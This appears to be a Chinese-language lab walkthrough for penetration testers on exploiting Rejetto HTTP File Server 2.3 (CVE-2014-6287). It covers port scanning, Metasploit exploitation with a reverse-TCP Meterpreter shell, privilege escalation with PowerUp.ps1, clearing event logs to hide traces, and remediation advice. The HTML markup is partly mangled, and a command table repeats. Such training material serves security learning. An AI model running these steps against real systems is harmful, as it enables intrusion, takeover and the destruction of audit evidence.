基于Rejetto HTTP File Server 2.3漏洞的渗透测试教学文档<\/h1>

1. 初始信息收集<\/h2>

1.1 端口扫描<\/h3>

使用Rustscan进行快速端口扫描：<\/p>

rustscan -a <目标IP> --ulimit 5000<\/span>
<\/span><\/span><\/code><\/pre>使用Nmap进行详细扫描：<\/p>
nmap -sC -sV -p80,135,139,445,5985,8080,47001,49152,49153,49154,49155,49157,49163,49164 <目标IP> -oN nmap.log
<\/span><\/span><\/code><\/pre>扫描结果分析：<\/p>

80端口：Web服务器<\/li>
139\/445端口：SMB服务<\/li>
5985端口：MS HTTPAPI服务<\/li>
8080端口：HttpFileServer服务（版本2.3）<\/li>
47001端口：处理HTTP请求的内核程序<\/li>
3389端口：SSL服务（加密RDP会话）<\/li>
<\/ul>
1.2 Web服务枚举<\/h3>
80端口Web服务：<\/strong><\/p>

查看最佳员工照片<\/li>
检查源代码获取潜在用户名信息<\/li>
<\/ul>
8080端口HttpFileServer 2.3：<\/strong><\/p>

文件服务器功能：存储和管理数据文件，允许网络内其他计算机访问<\/li>
可直接通过浏览器访问文件服务器界面<\/li>
<\/ul>
2. 漏洞研究与利用<\/h2>
2.1 漏洞搜索<\/h3>
使用Searchsploit查找HttpFileServer 2.3的漏洞：<\/p>
searchsploit http file server 2.3
<\/span><\/span><\/code><\/pre>检查特定漏洞详情（CVE-2014-6287）：<\/p>
searchsploit -x windows\/remote\/34668.txt
<\/span><\/span><\/code><\/pre>2.2 Metasploit利用<\/h3>
在Metasploit中搜索相关模块：<\/p>
search rejetto
search cve-2014-6287
<\/code><\/pre>
使用漏洞利用模块：<\/p>
use exploit\/windows\/http\/rejetto_hfs_exec
<\/code><\/pre>
3. 漏洞利用步骤详解<\/h2>
3.1 配置Metasploit模块<\/h3>


设置目标IP：<\/p>
set RHOSTS <目标IP>
<\/code><\/pre>
<\/li>

设置目标端口（通常为8080）：<\/p>
set RPORT 8080
<\/code><\/pre>
<\/li>

设置payload（推荐使用reverse TCP）：<\/p>
set payload windows\/meterpreter\/reverse_tcp
<\/code><\/pre>
<\/li>

设置本地监听IP和端口：<\/p>
set LHOST <本地IP>
set LPORT <监听端口>
<\/code><\/pre>
<\/li>

执行攻击：<\/p>
exploit
<\/code><\/pre>
<\/li>
<\/ol>
3.2 后渗透阶段<\/h3>
成功获取meterpreter会话后：<\/p>


获取系统信息：<\/p>
sysinfo
<\/code><\/pre>
<\/li>

获取当前用户权限：<\/p>
getuid
<\/code><\/pre>
<\/li>

尝试提权：<\/p>
getsystem
<\/code><\/pre>
<\/li>
<\/ol>
4. 权限提升技术<\/h2>
4.1 PowerShell枚举<\/h3>
使用PowerShell进行Windows权限提升枚举：<\/p>
# 检查系统信息<\/span>
<\/span><\/span>systeminfo
<\/span><\/span>
<\/span><\/span># 检查已安装的补丁<\/span>
<\/span><\/span>wmic qfe get Caption,Description,HotFixID,InstalledOn
<\/span><\/span>
<\/span><\/span># 检查运行的服务<\/span>
<\/span><\/span>Get-Service | Where-Object {$_.Status -eq<\/span> "Running"<\/span>}
<\/span><\/span>
<\/span><\/span># 检查计划任务<\/span>
<\/span><\/span>Get-ScheduledTask | Where-Object {$_.State -eq<\/span> "Ready"<\/span>}
<\/span><\/span><\/code><\/pre>4.2 常见提权技术<\/h3>


服务漏洞利用<\/strong>：<\/p>

检查弱权限服务<\/li>
检查可写服务路径<\/li>
<\/ul>
<\/li>

AlwaysInstallElevated<\/strong>：<\/p>
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer \/v AlwaysInstallElevated
<\/span><\/span>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer \/v AlwaysInstallElevated
<\/span><\/span><\/code><\/pre><\/li>

未引用的服务路径<\/strong>：<\/p>
wmic service get name,displayname,pathname,startmode | findstr \/i "auto"<\/span> | findstr \/i \/v "c:\windows\\"<\/span> | findstr \/i \/v """<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5. 获取管理员访问权限<\/h2>
5.1 使用本地漏洞提权<\/h3>


使用Metasploit的本地提权模块：<\/p>
background
search suggester
use post\/multi\/recon\/local_exploit_suggester
set SESSION <会话ID>
run
<\/code><\/pre>
<\/li>

根据建议选择合适的本地提权模块<\/p>
<\/li>
<\/ol>
5.2 使用PowerUp.ps1脚本<\/h3>


上传PowerUp.ps1脚本：<\/p>
upload \/path\/to\/PowerUp.ps1
<\/code><\/pre>
<\/li>

加载并执行脚本：<\/p>
load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks
<\/code><\/pre>
<\/li>

根据输出结果选择适当的提权方法<\/p>
<\/li>
<\/ol>
6. 清理痕迹<\/h2>


清除事件日志：<\/p>
clearev
<\/code><\/pre>
<\/li>

删除上传的文件：<\/p>
del PowerUp.ps1
<\/code><\/pre>
<\/li>

检查并删除创建的持久化后门<\/p>
<\/li>
<\/ol>
7. 报告编写要点<\/h2>

记录所有发现的开放端口和服务<\/li>
详细描述漏洞利用过程<\/li>
记录权限提升方法<\/li>
提供修复建议：

升级HttpFileServer到最新版本<\/li>
限制对文件服务器的访问<\/li>
应用最新的Windows安全补丁<\/li>
遵循最小权限原则配置服务账户<\/li>
<\/ul>
<\/li>
<\/ol>
附录：常用命令速查表<\/h2>



用途<\/th>
命令<\/th>
<\/tr>
<\/thead>


快速扫描<\/td>
rustscan -a <IP> --ulimit 5000<\/code><\/td>
<\/tr>

详细扫描<\/td>
nmap -sC -sV -p<ports> <IP> -oN nmap.log<\/code><\/td>
<\/tr>

搜索漏洞<\/td>
searchsploit <服务名\/版本><\/code><\/td>
<\/tr>

检查漏洞详情<\/td>
searchsploit -x <漏洞路径><\/code><\/td>
<\/tr>

Metasploit搜索<\/td>
search <关键词><\/code><\/td>
<\/tr>

Meterpreter系统信息<\/td>
sysinfo<\/code><\/td>
<\/tr>

Meterpreter提权<\/td>
getsystem<\/code><\/td>
<\/tr>

PowerShell系统信息<\/td>
systeminfo<\/code><\/td>
<\/tr>

PowerShell补丁检查<\/td>
wmic qfe get Caption,Description,HotFixID,InstalledOn<\/code><\/td>
<\/tr>
<\/tbody>
<\/table>

用途<\/th>	命令<\/th> <\/tr> <\/thead>
快速扫描<\/td>	`rustscan -a <IP> --ulimit 5000<\/code><\/td> <\/tr>`
详细扫描<\/td>	`nmap -sC -sV -p<ports> <IP> -oN nmap.log<\/code><\/td> <\/tr>`
搜索漏洞<\/td>	`searchsploit <服务名\/版本><\/code><\/td> <\/tr>`
检查漏洞详情<\/td>	`searchsploit -x <漏洞路径><\/code><\/td> <\/tr>`
Metasploit搜索<\/td>	`search <关键词><\/code><\/td> <\/tr>`
Meterpreter系统信息<\/td>	`sysinfo<\/code><\/td> <\/tr>`
Meterpreter提权<\/td>	`getsystem<\/code><\/td> <\/tr>`
PowerShell系统信息<\/td>	`systeminfo<\/code><\/td> <\/tr>`
PowerShell补丁检查<\/td>	`wmic qfe get Caption,Description,HotFixID,InstalledOn<\/code><\/td> <\/tr> <\/tbody> <\/table>`